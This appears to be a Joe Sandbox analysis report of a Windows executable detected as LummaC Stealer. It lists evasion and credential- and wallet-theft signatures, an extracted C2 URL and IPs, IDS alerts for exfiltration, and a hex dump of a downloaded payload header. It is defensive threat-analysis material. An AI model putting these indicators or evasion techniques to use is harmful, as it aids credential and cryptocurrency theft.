Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1561850
MD5:1eb940602d253a449c44e9ecfd4714c4
SHA1:ff6f23e46ef9135291f99e07d163c6962e8534ce
SHA256:da9b745fe87edb958afce58dd53a2ad33db48635b72d43de75b5dd378d07b75e
Tags:exeuser-Bitsight
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Creates a process in suspended mode (likely to inject code)
Downloads executable code via HTTP
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 5044 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 1EB940602D253A449C44E9ECFD4714C4)
    • chrome.exe (PID: 4876 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
      • chrome.exe (PID: 4364 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2680 --field-trial-handle=2436,i,13883662097603284509,5735806010481988831,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 7392 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
      • chrome.exe (PID: 7584 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1992,i,3177487743473689388,10012693031284183777,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup
{"C2 url": "https://property-imper.sbs/api", "Build Version": "LOGS11--LiveTraffi"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000003.2240378061.0000000001227000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000000.00000003.2185548493.0000000001223000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000003.2262622308.0000000001233000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000003.2186122101.0000000001226000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000003.2262259485.0000000001224000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 10 entries
              No Sigma rule has matched
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-24T13:39:04.061398+010020283713Unknown Traffic192.168.2.649707104.21.33.116443TCP
              2024-11-24T13:39:06.805445+010020283713Unknown Traffic192.168.2.649709104.21.33.116443TCP
              2024-11-24T13:39:09.374968+010020283713Unknown Traffic192.168.2.649710104.21.33.116443TCP
              2024-11-24T13:39:12.058941+010020283713Unknown Traffic192.168.2.649712104.21.33.116443TCP
              2024-11-24T13:39:14.539818+010020283713Unknown Traffic192.168.2.649718104.21.33.116443TCP
              2024-11-24T13:39:16.991686+010020283713Unknown Traffic192.168.2.649724104.21.33.116443TCP
              2024-11-24T13:39:19.558511+010020283713Unknown Traffic192.168.2.649733104.21.33.116443TCP
              2024-11-24T13:39:24.502043+010020283713Unknown Traffic192.168.2.649746104.21.33.116443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-24T13:39:05.319419+010020546531A Network Trojan was detected192.168.2.649707104.21.33.116443TCP
              2024-11-24T13:39:07.533117+010020546531A Network Trojan was detected192.168.2.649709104.21.33.116443TCP
              2024-11-24T13:39:25.257069+010020546531A Network Trojan was detected192.168.2.649746104.21.33.116443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-24T13:39:05.319419+010020498361A Network Trojan was detected192.168.2.649707104.21.33.116443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-24T13:39:07.533117+010020498121A Network Trojan was detected192.168.2.649709104.21.33.116443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-24T13:39:26.918577+010020197142Potentially Bad Traffic192.168.2.649752185.215.113.1680TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-24T13:39:17.691341+010020480941Malware Command and Control Activity Detected192.168.2.649724104.21.33.116443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: file.exeAvira: detected
              Source: file.exe.5044.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": "https://property-imper.sbs/api", "Build Version": "LOGS11--LiveTraffi"}
              Source: file.exeJoe Sandbox ML: detected
              Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
              Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
              Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49727 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.6:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.6:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.6:49710 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.6:49711 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.6:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.6:49718 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.6:49724 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49725 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.6:49726 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.6:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.6:49745 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.6:49746 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49778 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.6:49808 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.6:49819 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.6:49873 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49889 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.6:49902 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.6:49947 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49948 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.6:49966 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:50026 version: TLS 1.2
              Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: file.exe, 00000000.00000002.2578851659.0000000006412000.00000040.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2447507809.00000000083B0000.00000004.00001000.00020000.00000000.sdmp

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49707 -> 104.21.33.116:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49709 -> 104.21.33.116:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49707 -> 104.21.33.116:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49709 -> 104.21.33.116:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49724 -> 104.21.33.116:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49746 -> 104.21.33.116:443
              Source: Malware configuration extractorURLs: https://property-imper.sbs/api
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 24 Nov 2024 12:39:26 GMTContent-Type: application/octet-streamContent-Length: 2814976Last-Modified: Sun, 24 Nov 2024 12:33:16 GMTConnection: keep-aliveETag: "67431d0c-2af400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 60 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 2b 00 00 04 00 00 45 cc 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 74 63 6b 6e 6a 62 68 77 00 a0 2a 00 00 a0 00 00 00 94 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 61 7a 62 6a 6e 6c 6d 00 20 00 00 00 40 2b 00 00 04 00 00 00 ce 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 60 2b 00 00 22 00 00 00 d2 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
              Source: Joe Sandbox ViewIP Address: 13.107.246.63 13.107.246.63
              Source: Joe Sandbox ViewIP Address: 185.215.113.16 185.215.113.16
              Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
              Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
              Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49707 -> 104.21.33.116:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49710 -> 104.21.33.116:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49712 -> 104.21.33.116:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49718 -> 104.21.33.116:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49709 -> 104.21.33.116:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49733 -> 104.21.33.116:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49724 -> 104.21.33.116:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49746 -> 104.21.33.116:443
              Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.6:49752 -> 185.215.113.16:80
              Source: unknownHTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49727 version: TLS 1.0
              Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
              Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
              Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
              Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
              Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
              Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
              Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
              Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
              Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
              Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
              Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
              Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
              Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
              Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
              Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
              Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
              Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
              Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
              Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
              Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
              Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
              Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
              Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
              Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
              Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
              Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
              Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
              Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
              Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
              Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
              Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
              Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
              Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
              Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
              Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
              Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
              Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
              Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Sp8chA7XUbEVBFr&MD=AEems1gD HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
              Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
